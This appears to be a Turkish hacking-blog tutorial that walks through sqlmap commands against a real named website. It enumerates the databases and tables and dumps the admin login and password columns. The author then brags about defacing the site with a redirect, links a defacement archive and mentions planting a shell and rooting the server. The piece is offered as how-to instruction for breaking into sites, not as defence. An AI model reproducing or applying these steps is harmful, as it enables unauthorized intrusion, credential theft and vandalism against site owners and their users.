Merhaba Ben YıldızHan
Bugün sizlere KALİ LUNIX SQLMAP Kullanimini göstericem.Takip Eden Arkadaşlar 3 Konumuda Tamamiyle Okuduysa Artik SQL Açigini Kullanarak Site Hackleyebilir.
Bu Konun Dahada Ustaligi Dorktan Düşmeyen Bir Sitede SQL Bulmaktir Oda Çok Kolay Yani Mantik Diyorum.
Konumuza Geçelim
İlk Olarak Kali Işletim Sistemimiz Ve SQLMAP`ımız Kurulu Olmalidir.
Kali terminalini açalim ve SQLMAP bulundugu konuma girelim.Ben Telefondan Kullandigim için bilgisayarda hiç kali kullanmişligim yok
Direk menudende açabilirsiniz.
Açtiktan Sonra Hemen
./sqlmap.py -h Komutumuzu Verelim.
Bu Komutumuz Bize Komutlari gösterecektir.
--h Komutumuz ileri düzey komutlarimizi gösterir.
Şimdi Baktigimiza Göre Hedef Sitemizi Tespit Edelim.Ben Tespit ettim.
http://hentai-x.ru/ // Ahanda bu
Komutumuzu verelim.(Not:./sqlmap.py Bu Komut defaulttur sqlmap kalinin çalistirmasini söyledigimiz koddur.Degişikde olabilir)
./sqlmap.py -u http://hentai-x.ru/index.php?id=3 --dbs // Şimdi "-u" URL Tara Demek oda yari default gibi
"--dbs" asıl komutumuzdur.
Datebaseleri çek komutu yani.
Başlattik Ve biraz ilerledi bi Soru Sordu.
Bu Sorulari 2-3 kez Sorar Sorularsa önemlide sayilir.Başka Database Kullaniyormu Başka Açikli Bir Sayfa Arayalimmi Gibi Yes Diyelim Bisey Farketmez No Dersek Bazen İnject Etmez.
Sorularida Geçtik Ve DB`lerimizi Çektik Ben siteyi degistirmek zorunda kaldim yolda :D ilki işe yaramadi olur böyle arada saglam dork yazmaya baglidir.
DB`miz "srv40129_hentaiz"
Diger Komutumuz Şoyle Olacak
./sqlmap.py -u http://hentai-x.ru/index.php?id=3 -D srv40129_hentaiz --tables
Şimdi Buldugumuz Bilgilerin(datebase,tablolar,colonlar)
gibi tek tire ve Büyük Baş harfiyle yaziyoruz. Datebasemizi bulduk -D böyle yazcaz.Enterladik Devam.
Tablolarimiz Düştü.(ayip .s)
Bizi ilgilendiren tablomuz "super_user"
Diger Komutumuzu Girelim Ve Onuda Çekelim.
./sqlmap.py -u http://hentai-x.ru/index.php?id=3 -D srv40129_hentaiz
-T super_user --column
ve onuda çektik "login" "pasw"
./sqlmap.py -u http://hentai-x.ru/index.php?id=3 -D srv40129_hentaiz
-T super_user -C login --dump
./sqlmap.py -u http://hentai-x.ru/index.php?id=3 -D srv40129_hentaiz
-T super_user -C pasw --dump
Mıyşin Komplited Şimdi admin panelimizi bulak ve shell sokak.
Bazı site panelleri olmaz.Boşverin onları.
Ben shell sokmaya üşendim shell sokup rootlarsak daha çok site bulabiliriz.
Ben direk yönlendirme bastim.Site Girip bakabilirsiniz.
Zone;
http://hentai-x.ru/
http://golgeler.net/view->209888
------------------------------------
NOTLAR
------------------------------------
Kullanilan komutlarin açiklamalari;
-u=URL tara
--dbs=Databaseleri çek
--tables=Tablolari çek
--column=Colonlari çek
--dump=Bilgileri dök
Her komutun sonunu kapatmazsaniz hata verir veya databaselere brute atar.Tablolara brute atar.Buldugunuz Tablo isminide yazmalisiniz.
İlgili Diger Konular;
------------------------------------
Bitti :)
------------------------------------
Herhangi bi sorunuz oldugunda yorum olarak yazabilirsiniz.
Selametle.
Senin olay watch dogs olayına dönmüş
YanıtlaSil